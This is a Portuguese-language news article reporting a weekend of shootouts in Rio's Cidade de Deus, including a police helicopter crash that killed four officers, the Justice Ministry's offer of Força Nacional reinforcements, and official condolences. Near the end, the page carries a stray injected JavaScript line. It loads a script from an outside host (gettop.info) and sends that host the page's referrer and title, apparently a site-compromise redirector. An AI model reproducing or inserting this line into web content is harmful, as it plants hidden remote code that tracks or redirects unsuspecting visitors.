Ministério da Justiça oferece militares como reforço para a segurança no RJ

 
Perícia trabalha em helicóptero que caiu na Zona Oeste do Rio (Foto: Reprodução/ TV Globo)Perícia trabalha em helicóptero que caiu na Zona Oeste do Rio (Foto: Reprodução/ TV Globo)

 

O Ministério da Justiça deixou à disposição da Secretaria de Estado de Segurança do Rio de Janeiro militares da Força Nacional que estão na cidade para reforçar o policiamento na Cidade de Deus. A mensagem foi divulgada neste domingo (20) à tarde pela assessoria de comunicação social da pasta. 

A oferta chega após um fim de semana violento na comunidade da Zona Oeste do Rio. Em meio a tiroteios, ao todo, pelo menos 11 pessoas morreram. Entre as vítimas, quatro eram policiais militares que estavam em um helicóptero que caiu na região.

Ainda segundo informações da Justiça, o ministro Alexandre Moraes está acompanhando o que ocorre no Rio e disse que está em contato direto com o secretário de Segurança Roberto Sá. Além de Moraes, o presidente Michel Temer também se pronunciou sobre a situação da segurança no Rio de Janeiro lamentando a morte dos PMs.

“Lamentável a morte dos quatro PMs que cumpriam o seu dever durante operação no Rio de Janeiro. A minha solidariedade aos familiares e amigos”, ressaltou o presidente.

 

Luto oficial no RJ
Também neste domingo à tarde, o governador Luiz Fernando Pezão decretou luto oficial por três dias pelas mortes dos policiais que tripulavam a aeronave da Polícia Militar.

Os mortos foram identificados como sargento Rogério Félix Rainha, subtenente Camilo Barbosa Carvalho, capitão Willian de Freitas Schorcht e major Rogério Melo Costa.

“Reconhecemos e agradecemos a dedicação da Polícia Militar no combate ao crime e, em especial, dos policiais que perderam a vida no exercício de proteger e defender a sociedade. Expresso meus sentimentos aos parentes e amigos dos militares. Vamos seguir em frente em defesa dos cidadãos fluminenses”, afirmou o governador, em nota.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário